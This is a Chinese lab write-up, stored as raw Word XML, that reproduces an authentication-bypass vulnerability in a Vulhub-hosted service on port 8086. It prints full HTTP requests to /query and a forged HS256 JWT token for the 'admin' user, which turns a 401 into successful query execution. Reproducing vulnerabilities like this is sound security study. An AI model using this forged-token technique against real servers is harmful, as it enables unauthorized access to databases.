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A46A32" w:rsidRDefault="00A46A32">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A46A32">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>一、靶场搭建</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A46A32" w:rsidRDefault="00A46A32" w:rsidP="00A46A32">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="737"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、Vul</w:t>
      </w:r>
      <w:r>
        <w:t>hub</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>启动</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A46A32" w:rsidRDefault="00A46A32" w:rsidP="00A46A32">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="737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32" w:rsidRDefault="00A46A32">
                            <w:r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A46A32" w:rsidRDefault="00A46A32">
                      <w:r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A32" w:rsidRDefault="00A46A32" w:rsidP="00A46A32">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="737"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2、访问8</w:t>
      </w:r>
      <w:r>
        <w:t>086</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>端口的/</w:t>
      </w:r>
      <w:r>
        <w:t>debug/vars</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>目录，可查看到一些服务信息</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A46A32" w:rsidRDefault="00A46A32" w:rsidP="00A46A32">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="737"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A46A32" w:rsidRPr="00A46A32" w:rsidRDefault="00A46A32">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A46A32">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>二、漏洞复现</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A46A32" w:rsidRDefault="00A46A32">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1、发送S</w:t>
      </w:r>
      <w:r>
        <w:t>QL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语句出现4</w:t>
      </w:r>
      <w:r>
        <w:t>01</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>错误</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A46A32" w:rsidRDefault="00A46A3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68686" cy="1404620"/>
                <wp:effectExtent l="0" t="0" r="27305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6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E78" w:rsidRDefault="00541E78" w:rsidP="00541E78">
                            <w:r>
                              <w:t>POST /query HTTP/1.1</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00541E78" w:rsidRDefault="00541E78" w:rsidP="00541E78">
                            <w:r>
                              <w:t xml:space="preserve">Host: </w:t>
                            </w:r>
                            <w:r>
                              <w:t>your-ip</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00541E78" w:rsidRDefault="00541E78" w:rsidP="00541E78">
                            <w:r>
                              <w:t>User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00541E78" w:rsidRDefault="00541E78" w:rsidP="00541E78">
                            <w:r>
                              <w:t>Accept: */*</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00541E78" w:rsidRDefault="00541E78" w:rsidP="00541E78">
                            <w:r>
                              <w:t>Accept-Encoding: gzip, deflate</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00541E78" w:rsidRDefault="00541E78" w:rsidP="00541E78">
                            <w:r>
                              <w:t>Accept-Language: zh-CN,zh;q=0.9</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00541E78" w:rsidRDefault="00541E78" w:rsidP="00541E78">
                            <w:r>
                              <w:t>Connection: close</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00541E78" w:rsidRDefault="00541E78" w:rsidP="00541E78">
                            <w:r>
                              <w:t>Content-Type: application/x-www-form-urlencoded</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00541E78" w:rsidRDefault="00541E78" w:rsidP="00541E78">
                            <w:r>
                              <w:t>Content-Length: 22</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00541E78" w:rsidRDefault="00541E78" w:rsidP="00541E78"/>
                          <w:p w:rsidR="00A46A32" w:rsidRDefault="00541E78" w:rsidP="00541E78">
                            <w:r>
                              <w:t>db=sample&amp;q=show+users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">
                <v:textbox style="mso-fit-shape-to-text:t">
                  <w:txbxContent>
                    <w:p w:rsidR="00541E78" w:rsidRDefault="00541E78" w:rsidP="00541E78">
                      <w:r>
                        <w:t>POST /query HTTP/1.1</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00541E78" w:rsidRDefault="00541E78" w:rsidP="00541E78">
                      <w:r>
                        <w:t xml:space="preserve">Host: </w:t>
                      </w:r>
                      <w:r>
                        <w:t>your-ip</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00541E78" w:rsidRDefault="00541E78" w:rsidP="00541E78">
                      <w:r>
                        <w:t>User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00541E78" w:rsidRDefault="00541E78" w:rsidP="00541E78">
                      <w:r>
                        <w:t>Accept: */*</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00541E78" w:rsidRDefault="00541E78" w:rsidP="00541E78">
                      <w:r>
                        <w:t>Accept-Encoding: gzip, deflate</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00541E78" w:rsidRDefault="00541E78" w:rsidP="00541E78">
                      <w:r>
                        <w:t>Accept-Language: zh-CN,zh;q=0.9</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00541E78" w:rsidRDefault="00541E78" w:rsidP="00541E78">
                      <w:r>
                        <w:t>Connection: close</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00541E78" w:rsidRDefault="00541E78" w:rsidP="00541E78">
                      <w:r>
                        <w:t>Content-Type: application/x-www-form-urlencoded</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00541E78" w:rsidRDefault="00541E78" w:rsidP="00541E78">
                      <w:r>
                        <w:t>Content-Length: 22</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00541E78" w:rsidRDefault="00541E78" w:rsidP="00541E78"/>
                    <w:p w:rsidR="00A46A32" w:rsidRDefault="00541E78" w:rsidP="00541E78">
                      <w:r>
                        <w:t>db=sample&amp;q=show+users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A32" w:rsidRDefault="00A46A32">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2、借助</w:t>
      </w:r>
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidRPr="0063516F">
          <w:rPr>
            <w:rStyle w:val="a7"/>
            <w:rFonts w:hint="eastAsia"/>
          </w:rPr>
          <w:t>h</w:t>
        </w:r>
        <w:r w:rsidRPr="0063516F">
          <w:rPr>
            <w:rStyle w:val="a7"/>
          </w:rPr>
          <w:t>ttps://jwt.io/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>生成</w:t>
      </w:r>
      <w:r>
        <w:t>jwt token</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，a</w:t>
      </w:r>
      <w:r>
        <w:t>dmin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为已存在的用户，e</w:t>
      </w:r>
      <w:r>
        <w:t>xp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是时间戳，代表这个t</w:t>
      </w:r>
      <w:r>
        <w:t>oken</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的过期时间，需要设置为未来的时间戳</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A46A32" w:rsidRDefault="00541E78">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0">
                <wp:extent cx="5252357" cy="1404620"/>
                <wp:effectExtent l="0" t="0" r="24765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3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E78" w:rsidRPr="00541E78" w:rsidRDefault="00541E78" w:rsidP="00541E78">
                            <w:r w:rsidRPr="00541E78">
                              <w:t>{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 xml:space="preserve">  "alg": "HS256",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 xml:space="preserve">  "typ": "JWT"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}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{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 xml:space="preserve">  "username": "admin",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 xml:space="preserve">  "exp": 1653564500</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00541E78" w:rsidRDefault="00541E78" w:rsidP="00541E78">
                            <w:r w:rsidRPr="00541E7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">
                <v:textbox style="mso-fit-shape-to-text:t">
                  <w:txbxContent>
                    <w:p w:rsidR="00541E78" w:rsidRPr="00541E78" w:rsidRDefault="00541E78" w:rsidP="00541E78">
                      <w:r w:rsidRPr="00541E78">
                        <w:t>{</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00541E78" w:rsidRPr="00541E78" w:rsidRDefault="00541E78" w:rsidP="00541E78">
                      <w:r w:rsidRPr="00541E78">
                        <w:t xml:space="preserve">  "alg": "HS256",</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00541E78" w:rsidRPr="00541E78" w:rsidRDefault="00541E78" w:rsidP="00541E78">
                      <w:r w:rsidRPr="00541E78">
                        <w:t xml:space="preserve">  "typ": "JWT"</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00541E78" w:rsidRPr="00541E78" w:rsidRDefault="00541E78" w:rsidP="00541E78">
                      <w:r w:rsidRPr="00541E78">
                        <w:t>}</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00541E78" w:rsidRPr="00541E78" w:rsidRDefault="00541E78" w:rsidP="00541E78">
                      <w:r w:rsidRPr="00541E78">
                        <w:t>{</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00541E78" w:rsidRPr="00541E78" w:rsidRDefault="00541E78" w:rsidP="00541E78">
                      <w:r w:rsidRPr="00541E78">
                        <w:t xml:space="preserve">  "username": "admin",</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00541E78" w:rsidRPr="00541E78" w:rsidRDefault="00541E78" w:rsidP="00541E78">
                      <w:r w:rsidRPr="00541E78">
                        <w:t xml:space="preserve">  "exp": 1653564500</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00541E78" w:rsidRDefault="00541E78" w:rsidP="00541E78">
                      <w:r w:rsidRPr="00541E7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1E78" w:rsidRDefault="00541E7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52085" cy="1404620"/>
                <wp:effectExtent l="0" t="0" r="2476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E78" w:rsidRDefault="00541E78">
                            <w:r w:rsidRPr="00541E78">
                              <w:t>eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiZXhwIjoxNjUzNTY0NTAwfQ.OROs6K_bjWaYtxvFIAcvmPS_k9Cmhlujp7unWXUEK20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">
                <v:textbox style="mso-fit-shape-to-text:t">
                  <w:txbxContent>
                    <w:p w:rsidR="00541E78" w:rsidRDefault="00541E78">
                      <w:r w:rsidRPr="00541E78">
                        <w:t>eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiZXhwIjoxNjUzNTY0NTAwfQ.OROs6K_bjWaYtxvFIAcvmPS_k9Cmhlujp7unWXUEK20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A32" w:rsidRDefault="00A46A32">
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、发送如下j</w:t>
      </w:r>
      <w:r>
        <w:t>wt token</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的数据包，S</w:t>
      </w:r>
      <w:r>
        <w:t>QL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语句执行成功</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00541E78" w:rsidRDefault="00541E7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4129" cy="1404620"/>
                <wp:effectExtent l="0" t="0" r="22225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E78" w:rsidRPr="00541E78" w:rsidRDefault="00541E78" w:rsidP="00541E78">
                            <w:r w:rsidRPr="00541E78">
                              <w:t>POST /query HTTP/1.1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Host: your-ip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Accept-Encoding: gzip, deflate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Accept: */*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Accept-Language: en</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00541E78" w:rsidRPr="00541E78" w:rsidRDefault="00541E78" w:rsidP="00541E78">
                            <w:bookmarkStart w:id="0" w:name="_GoBack"/>
                            <w:r w:rsidRPr="00541E78">
                              <w:t>Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiZXhwIjoxNjUzNTY0NTAwfQ.OROs6K_bjWaYtxvFIAcvmPS_k9Cmhlujp7unWXUEK20</w:t>
                            </w:r>
                          </w:p>
                          <w:bookmarkEnd w:id="0"/>
                          <w:p w:rsidR="00541E78" w:rsidRPr="00541E78" w:rsidRDefault="00541E78" w:rsidP="00541E78">
                            <w:r w:rsidRPr="00541E78">
                              <w:t>User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)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Connection: close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Content-Type: application/x-www-form-urlencoded</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00541E78" w:rsidRPr="00541E78" w:rsidRDefault="00541E78" w:rsidP="00541E78">
                            <w:r w:rsidRPr="00541E78">
                              <w:t>Content-Length: 22</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00541E78" w:rsidRPr="00541E78" w:rsidRDefault="00541E78" w:rsidP="00541E78"/>
                          <w:p w:rsidR="00541E78" w:rsidRDefault="00541E78" w:rsidP="00541E78">
                            <w:r w:rsidRPr="00541E78">
                              <w:t>db=sample&amp;q=show+users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">
                <v:textbox style="mso-fit-shape-to-text:t">
                  <w:txbxContent>
                    <w:p w:rsidR="00541E78" w:rsidRPr="00541E78" w:rsidRDefault="00541E78" w:rsidP="00541E78">
                      <w:r w:rsidRPr="00541E78">
                        <w:t>POST /query HTTP/1.1</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00541E78" w:rsidRPr="00541E78" w:rsidRDefault="00541E78" w:rsidP="00541E78">
                      <w:r w:rsidRPr="00541E78">
                        <w:t>Host: your-ip</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00541E78" w:rsidRPr="00541E78" w:rsidRDefault="00541E78" w:rsidP="00541E78">
                      <w:r w:rsidRPr="00541E78">
                        <w:t>Accept-Encoding: gzip, deflate</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00541E78" w:rsidRPr="00541E78" w:rsidRDefault="00541E78" w:rsidP="00541E78">
                      <w:r w:rsidRPr="00541E78">
                        <w:t>Accept: */*</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00541E78" w:rsidRPr="00541E78" w:rsidRDefault="00541E78" w:rsidP="00541E78">
                      <w:r w:rsidRPr="00541E78">
                        <w:t>Accept-Language: en</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00541E78" w:rsidRPr="00541E78" w:rsidRDefault="00541E78" w:rsidP="00541E78">
                      <w:bookmarkStart w:id="1" w:name="_GoBack"/>
                      <w:r w:rsidRPr="00541E78">
                        <w:t>Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiZXhwIjoxNjUzNTY0NTAwfQ.OROs6K_bjWaYtxvFIAcvmPS_k9Cmhlujp7unWXUEK20</w:t>
                      </w:r>
                    </w:p>
                    <w:bookmarkEnd w:id="1"/>
                    <w:p w:rsidR="00541E78" w:rsidRPr="00541E78" w:rsidRDefault="00541E78" w:rsidP="00541E78">
                      <w:r w:rsidRPr="00541E78">
                        <w:t>User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00541E78" w:rsidRPr="00541E78" w:rsidRDefault="00541E78" w:rsidP="00541E78">
                      <w:r w:rsidRPr="00541E78">
                        <w:t>Connection: close</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00541E78" w:rsidRPr="00541E78" w:rsidRDefault="00541E78" w:rsidP="00541E78">
                      <w:r w:rsidRPr="00541E78">
                        <w:t>Content-Type: application/x-www-form-urlencoded</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00541E78" w:rsidRPr="00541E78" w:rsidRDefault="00541E78" w:rsidP="00541E78">
                      <w:r w:rsidRPr="00541E78">
                        <w:t>Content-Length: 22</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00541E78" w:rsidRPr="00541E78" w:rsidRDefault="00541E78" w:rsidP="00541E78"/>
                    <w:p w:rsidR="00541E78" w:rsidRDefault="00541E78" w:rsidP="00541E78">
                      <w:r w:rsidRPr="00541E78">
                        <w:t>db=sample&amp;q=show+users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8C5" w:rsidRDefault="001478C5" w:rsidP="00A46A32">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="001478C5" w:rsidRDefault="001478C5" w:rsidP="00A4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8C5" w:rsidRDefault="001478C5" w:rsidP="00A46A32">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="001478C5" w:rsidRDefault="001478C5" w:rsidP="00A46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A2"/>
    <w:rsid w:val="001478C5"/>
    <w:rsid w:val="002E5FA2"/>
    <w:rsid w:val="00541E78"/>
    <w:rsid w:val="00A46A32"/>
    <w:rsid w:val="00DA3E51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121CE"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{613055BA-274F-4CB2-98A8-2A0D27E6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A32"/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="a7">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A4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wt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2022-05-26T11:13:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-05-26T12:00:00Z</dcterms:modified>
</cp:coreProperties>
</file>